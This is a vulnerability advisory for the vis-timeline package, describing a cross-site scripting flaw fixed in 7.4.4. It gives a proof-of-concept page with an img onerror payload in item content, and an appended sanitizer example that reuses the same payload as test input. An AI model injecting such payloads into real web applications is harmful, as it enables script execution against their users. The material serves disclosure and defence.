vis-timeline@6.2.2 vulnerabilities

Create a fully customizable, interactive timeline with items and ranges.

  • latest version

    7.7.3

  • latest non vulnerable version

  • first published

    5 years ago

  • latest version published

    1 year ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the vis-timeline package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability (severity: M): Cross-site Scripting (XSS)

    vis-timeline (Timeline/Graph2D) is an interactive visualization chart for displaying data over time.

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS). An attacker with the ability to control the items of a Timeline element can inject additional script code into the generated application.

    PoC

    <!DOCTYPE html>
    <html>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.min.js" integrity="sha512-3FADGlV0gOpnQn56VOryrvOeY1zMrNiSMyDnxD/5ZEBJgt5n+IcAvfzm16/Cwyhro9RJgFgBWeoUmLceNgbTrA==" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.css" integrity="sha512-GFG4HXPbPcM487tbwN4sscz1AVK9uQcY7Y6uWwLlgWbAXCJI2V/n7Em7vKpH+Q1cqQh1PyCavHr94KaWi0UgOA==" crossorigin="anonymous" />

    <body>
    <style>
    body,
    html {
      font-family: sans-serif;
    }
    </style>
    <p>A basic timeline. You can move and zoom the timeline, and select items.</p>
    <div id="visualization"></div>
    <script>
    // DOM element where the Timeline will be attached
    var container = document.getElementById("visualization");

    // Create a DataSet (allows two way data-binding)
    var items = new vis.DataSet([
      { id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
      { id: 2, content: "item 2", start: "2014-04-14" },
      { id: 3, content: "item 3", start: "2014-04-18" },
      { id: 4, content: "item 4", start: "2014-04-16", end: "2014-04-19" },
      { id: 5, content: "item 5", start: "2014-04-25" },
      { id: 6, content: "item 6", start: "2014-04-27", type: "point" },
    ]);

    // Configuration for the Timeline
    var options = {};
    var timeline = new vis.Timeline(container, items, options);
    </script>

    </body>
    </html>


    How to fix Cross-site Scripting (XSS)?

    Upgrade vis-timeline to version 7.4.4 or higher.

    Vulnerable version: <7.4.4
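    The timeline renders each item's `content` string as HTML, which is why the PoC item above executes. As an added example that is not part of this advisory or of the vis-timeline project, the following helper escapes untrusted item content and drops unrecognised fields before the items reach `vis.DataSet`, an interim mitigation for an application that cannot yet move to 7.4.4; the function names and the sample items are constructed for this illustration.

```javascript
// Added example (not from the advisory or vis-timeline): escape untrusted
// item content before it is handed to vis.DataSet. The timeline inserts
// `content` as HTML, so any markup in it runs in the page (see the PoC).

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Replace every character that can open a tag or break out of an attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Item fields copied through unchanged; anything else the untrusted object
// carries is dropped rather than passed to the timeline.
const ALLOWED_FIELDS = ["id", "start", "end", "type", "group"];

// Build a copy of one untrusted item that is safe to render.
// vis-timeline also accepts a DOM node as `content`; a caller that controls
// the data must not be able to supply one, so non-strings are rejected.
function sanitizeItem(raw) {
  if (typeof raw.content !== "string") {
    throw new TypeError(`item ${raw.id}: content must be a string`);
  }
  const safe = {};
  for (const key of ALLOWED_FIELDS) {
    if (key in raw) safe[key] = raw[key];
  }
  safe.content = escapeHtml(raw.content);
  return safe;
}

function sanitizeItems(rawItems) {
  return rawItems.map(sanitizeItem);
}

// Constructed sample input: the item from the advisory PoC plus a benign one.
const UNTRUSTED_ITEMS = [
  { id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
  { id: 2, content: "item 2", start: "2014-04-14" },
];

const SAFE_ITEMS = sanitizeItems(UNTRUSTED_ITEMS);
// In the browser: new vis.Timeline(container, new vis.DataSet(SAFE_ITEMS), {});
```

    The escaped text is displayed literally inside the item; this does not replace the upgrade, since it only covers data your own code passes in.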